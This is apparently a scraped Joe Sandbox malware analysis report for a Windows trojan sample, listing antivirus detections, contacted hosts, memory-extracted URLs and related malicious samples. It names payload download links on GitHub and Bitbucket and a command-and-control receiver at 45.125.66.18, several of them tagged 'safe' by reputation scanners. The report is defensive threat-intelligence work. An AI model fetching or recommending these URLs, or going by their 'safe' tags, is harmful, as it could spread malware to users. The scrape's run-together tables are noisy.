Loading BitLocker PowerShell Module 22->76 30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        38 conhost.exe 26->38         started        40 2 other processes 26->40 signatures13 process14

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
UBONg7lmVR.exe3%ReversingLabsWin32.Trojan.Generic
UBONg7lmVR.exe14%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Reka\rapnewsa.exe100%AviraHEUR/AGEN.1315917
C:\Reka\rapnewsa.exe100%Joe Sandbox ML
C:\Reka\rapnewsa.exe16%ReversingLabs
C:\Reka\rapnewsa.exe24%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe11%ReversingLabs
C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe8%VirustotalBrowse
No Antivirus matches
SourceDetectionScannerLabelLink
s3-w.us-east-1.amazonaws.com0%VirustotalBrowse
bitbucket.org1%VirustotalBrowse
github.com0%VirustotalBrowse
raw.githubusercontent.com0%VirustotalBrowse
httpbin.org1%VirustotalBrowse
bbuseruploads.s3.amazonaws.com3%VirustotalBrowse
SourceDetectionScannerLabelLink
http://www.fontbureau.com/designersG0%URL Reputationsafe
http://www.fontbureau.com/designersG0%URL Reputationsafe
http://www.fontbureau.com/designers/?0%URL Reputationsafe
http://www.fontbureau.com/designers/?0%URL Reputationsafe
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://www.fontbureau.com/designers?0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.fontbureau.com/designers0%URL Reputationsafe
http://www.goodfont.co.kr0%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.typography.netD0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.fonts.com0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://www.sakkal.com0%URL Reputationsafe
https://httpbin.org/get0%URL Reputationsafe
http://www.fontbureau.com0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.fontbureau.com/designers80%URL Reputationsafe
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/0%Avira URL Cloudsafe
https://45.125.66.18/api/receiver/recv0%Avira URL Cloudsafe
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.com666666666666666666660%Avira URL Cloudsafe
https://github.com0%Avira URL Cloudsafe
http://s3-w.us-east-1.amazonaws.comd0%Avira URL Cloudsafe
http://bbuseruploads.s3.amazonaws.comd0%Avira URL Cloudsafe
https://45.125.66.18/0%Avira URL Cloudsafe
https://45.125.66.18/api/receiver/recv3%VirustotalBrowse
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/0%VirustotalBrowse
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.com666666666666666666660%VirustotalBrowse
https://aui-cdn.atlassian.com/0%Avira URL Cloudsafe
http://s3-w.us-east-1.amazonaws.com0%Avira URL Cloudsafe
https://bitbucket.org0%Avira URL Cloudsafe
https://aui-cdn.atlassian.com/0%VirustotalBrowse
https://bitbucket.org/updated24/updated24/downloads/Updated11.12.exe0%Avira URL Cloudsafe
http://bbuseruploads.s3.amazonaws.com0%Avira URL Cloudsafe
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net0%VirustotalBrowse
https://github.com0%VirustotalBrowse
http://s3-w.us-east-1.amazonaws.com0%VirustotalBrowse
https://bitbucket.org1%VirustotalBrowse
http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
https://bbuseruploads.s3.amazonaws.com0%Avira URL Cloudsafe
https://45.125.66.18/2%VirustotalBrowse
https://web-security-reports.services.atlassian.com/csp-report/bb-website0%Avira URL Cloudsafe
http://bbuseruploads.s3.amazonaws.com3%VirustotalBrowse
https://45.125.66.18/api/receiver/recv)0%Avira URL Cloudsafe
https://bitbucket.org/updated24/updated24/downloads/Updated11.12.exe1%VirustotalBrowse
https://45.125.66.18:443/api/receiver/recv0%Avira URL Cloudsafe
https://dz8aopenkvv6s.cloudfront.net0%Avira URL Cloudsafe
http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
https://web-security-reports.services.atlassian.com/csp-report/bb-website0%VirustotalBrowse
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe0%Avira URL Cloudsafe
https://raw.githubusercontent.com/workhasf/kelm/main/yjsefceawd.json0%Avira URL Cloudsafe
https://45.125.66.18:443/api/receiver/recv3%VirustotalBrowse
https://cdn.cookielaw.org/0%Avira URL Cloudsafe
https://bbuseruploads.s3.amazonaws.com3%VirustotalBrowse
https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-0%Avira URL Cloudsafe
https://dz8aopenkvv6s.cloudfront.net0%VirustotalBrowse
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe1%VirustotalBrowse
https://raw.githubusercontent.com/workhasf/kelm/main/nepipirusas.json0%Avira URL Cloudsafe
http://microsoft.coU0%Avira URL Cloudsafe
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;0%Avira URL Cloudsafe
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe
https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4%VirustotalBrowse
https://cdn.cookielaw.org/0%VirustotalBrowse
https://github.com/workhasf/kelm/raw/main/iconozave.exeC:0%Avira URL Cloudsafe
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exePROCESSOR_IDENTIFIER=Intel640%Avira URL Cloudsafe
https://github.com/workhasf/kelm/raw/main/iconozave.exe0%Avira URL Cloudsafe
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;0%VirustotalBrowse
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net0%VirustotalBrowse
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exePROCESSOR_IDENTIFIER=Intel641%VirustotalBrowse
https://github.com/workhasf/kelm/raw/main/iconozave.exe0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
s3-w.us-east-1.amazonaws.com
52.216.51.233
truefalseunknown
bitbucket.org
185.166.143.49
truefalseunknown
github.com
140.82.121.3
truefalseunknown
raw.githubusercontent.com
185.199.111.133
truefalseunknown
httpbin.org
3.211.178.193
truefalseunknown
bbuseruploads.s3.amazonaws.com
unknown
unknownfalseunknown
NameMaliciousAntivirus DetectionReputation
https://45.125.66.18/api/receiver/recvfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bitbucket.org/updated24/updated24/downloads/Updated11.12.exefalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://httpbin.org/getfalse
  • URL Reputation: safe
unknown
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exefalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://raw.githubusercontent.com/workhasf/kelm/main/yjsefceawd.jsonfalse
  • Avira URL Cloud: safe
unknown
https://raw.githubusercontent.com/workhasf/kelm/main/nepipirusas.jsonfalse
  • Avira URL Cloud: safe
unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exefalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://www.fontbureau.com/designersGUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://www.fontbureau.com/designers/?UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://www.founder.com.cn/cn/bTheUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.fontbureau.com/designers?UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://github.comy5cm2yzz.hwt.exe, 00000002.00000002.2759424988.000000C0000A8000.00000004.00001000.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.tiro.comUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.fontbureau.com/designersUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.goodfont.co.krUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://s3-w.us-east-1.amazonaws.comdUBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.sajatypeworks.comUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://www.typography.netDUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.founder.com.cn/cn/cTheUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.com66666666666666666666y5cm2yzz.hwt.exe, 00000002.00000002.2760615080.000000C0001BE000.00000004.00001000.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://bbuseruploads.s3.amazonaws.comdUBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.galapagosdesign.com/staff/dennis.htmUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://45.125.66.18/rapnewsa.exe, 00000017.00000002.2746189003.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.netUBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.galapagosdesign.com/DPleaseUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://aui-cdn.atlassian.com/UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.fonts.comUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.sandoll.co.krUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.urwpp.deDPleaseUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.zhongyicts.com.cnUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://s3-w.us-east-1.amazonaws.comUBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D61000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.sakkal.comUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://bitbucket.orgUBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D61000.00000004.00000800.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://bbuseruploads.s3.amazonaws.comUBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.fontbureau.comUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://bbuseruploads.s3.amazonaws.comUBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-websiteUBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://45.125.66.18/api/receiver/recv)rapnewsa.exe, 00000017.00000002.2746189003.00000000013AE000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://45.125.66.18:443/api/receiver/recvrapnewsa.exe, 00000017.00000002.2746189003.00000000013EA000.00000004.00000020.00020000.00000000.sdmpfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://dz8aopenkvv6s.cloudfront.netUBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.carterandcone.comlUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.fontbureau.com/designers/cabarga.htmlNUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.founder.com.cn/cnUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.fontbureau.com/designers/frere-user.htmlUBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.jiyu-kobo.co.jp/UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://cdn.cookielaw.org/UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpfalse
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://microsoft.coUrapnewsa.exe, 00000017.00000002.2746189003.00000000013F3000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.fontbureau.com/designers8UBONg7lmVR.exe, 00000000.00000002.3557834176.000000000AD42000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.netUBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DBD000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.3548034126.0000000005DB9000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exeC:y5cm2yzz.hwt.exe, 00000002.00000002.2759424988.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exePROCESSOR_IDENTIFIER=Intel64y5cm2yzz.hwt.exe, 00000002.00000002.2759424988.000000C00014C000.00000004.00001000.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
185.166.143.49
bitbucket.orgGermany
16509AMAZON-02USfalse
140.82.121.3
github.comUnited States
36459GITHUBUSfalse
52.216.51.233
s3-w.us-east-1.amazonaws.comUnited States
16509AMAZON-02USfalse
3.211.178.193
httpbin.orgUnited States
14618AMAZON-AESUSfalse
185.199.111.133
raw.githubusercontent.comNetherlands
54113FASTLYUSfalse
45.125.66.18
unknownHong Kong
133398TELE-ASTeleAsiaLimitedHKfalse
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1499702
Start date and time:2024-08-27 13:04:47 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 8m 47s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Run with higher sleep bypass
Number of analysed new started processes analysed:28
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:UBONg7lmVR.exe
renamed because original name is a hash value
Original Sample Name:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e.exe
Detection:MAL
Classification:mal75.evad.winEXE@27/32@5/6
EGA Information:
  • Successful, ratio: 66.7%
HCA Information:
  • Successful, ratio: 84%
  • Number of executed functions: 244
  • Number of non-executed functions: 15
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target y5cm2yzz.hwt.exe, PID 7992 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
185.166.143.49https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
    sostener.vbsGet hashmaliciousRemcosBrowse
      Crpted.vbsGet hashmaliciousUnknownBrowse
        sostener.vbsGet hashmaliciousRemcosBrowse
          remittances.exeGet hashmaliciousRemcos, GuLoaderBrowse
            ExeFile (71).exeGet hashmaliciousUnknownBrowse
              xKCGmDmnB1.exeGet hashmaliciousLummaCBrowse
                SecuriteInfo.com.Win32.DropperX-gen.16703.29630.exeGet hashmaliciousLummaCBrowse
                  SecuriteInfo.com.Win32.PWSX-gen.17487.29686.exeGet hashmaliciousLummaCBrowse
                    https://t.ly/tCnoFGet hashmaliciousUnknownBrowse
                      140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                      • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                      firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                      • github.com/john-xor/temp/blob/main/index.html?raw=true
                      0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                      • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                      MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                      • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                      RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                      • github.com/ssbb36/stv/raw/main/5.mp3
                      185.199.111.133SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exeGet hashmaliciousCoinhiveBrowse
                        https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1Get hashmaliciousHTMLPhisherBrowse
                          https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                            https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                              file.exeGet hashmaliciousPython Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                N8LgG4xO0F.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  5c683657-3d2b-5cd5-b372-9be474a3f97e.emlGet hashmaliciousUnknownBrowse
                                    SecuriteInfo.com.Trojan.Siggen21.45671.28064.9687.exeGet hashmaliciousUnknownBrowse
                                      https://error--occurs--site.vercel.app/Get hashmaliciousUnknownBrowse
                                        45.125.66.181feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                          V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                            V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              s3-w.us-east-1.amazonaws.comNotificacon Documneto.vbsGet hashmaliciousUnknownBrowse
                                              • 54.231.130.97
                                              Mi_Documento.jsGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 52.216.44.89
                                              https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                                              • 52.216.169.27
                                              https://pentaleon.com/?sragyzsragyzGet hashmaliciousUnknownBrowse
                                              • 3.5.16.100
                                              sostener.vbsGet hashmaliciousRemcosBrowse
                                              • 3.5.29.127
                                              sostener.vbsGet hashmaliciousAsyncRATBrowse
                                              • 52.217.200.17
                                              sostener.vbsGet hashmaliciousRemcosBrowse
                                              • 3.5.28.42
                                              http://yathuchandran.github.io/Metamask.cloneGet hashmaliciousUnknownBrowse
                                              • 52.217.164.209
                                              http://web3linksync.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 3.5.25.119
                                              bitbucket.orgNotificacon Documneto.vbsGet hashmaliciousUnknownBrowse
                                              • 185.166.143.50
                                              Notificacon Documneto (2).vbsGet hashmaliciousUnknownBrowse
                                              • 185.166.143.48
                                              Mi_Documento.jsGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 185.166.143.50
                                              https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                                              • 185.166.143.49
                                              sostener.vbsGet hashmaliciousRemcosBrowse
                                              • 185.166.143.49
                                              sostener.vbsGet hashmaliciousAsyncRATBrowse
                                              • 185.166.143.48
                                              Crpted.vbsGet hashmaliciousUnknownBrowse
                                              • 185.166.143.49
                                              sostener.vbsGet hashmaliciousRemcosBrowse
                                              • 185.166.143.49
                                              http://bitbucket.org/WindowsAddict/microsoft-activation-scripts/raw/35e044ddc85eed60b27b37c48371bd19cdc678b7/MAS/All-In-One-Version/MAS_AIO-CRC32_8C3AA7E0.cmd%20bitbucket.orgGet hashmaliciousHTMLPhisherBrowse
                                              • 185.166.143.50
                                              github.com1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.3
                                              https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.3
                                              https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.4
                                              https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.3
                                              http://chengduyiwokeji-haiwai.datasink.datasjourney.comGet hashmaliciousUnknownBrowse
                                              • 140.82.121.3
                                              ep_setup.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exeGet hashmaliciousPhemedrone StealerBrowse
                                              • 140.82.121.3
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              FASTLYUShttps://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                              • 151.101.65.44
                                              1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 185.199.109.133
                                              https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                                              • 151.101.66.137
                                              https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                              • 199.232.188.84
                                              http://ebay.to/3u2gAmeGet hashmaliciousUnknownBrowse
                                              • 199.232.188.84
                                              https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
                                              • 185.199.109.133
                                              http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                                              • 151.101.129.229
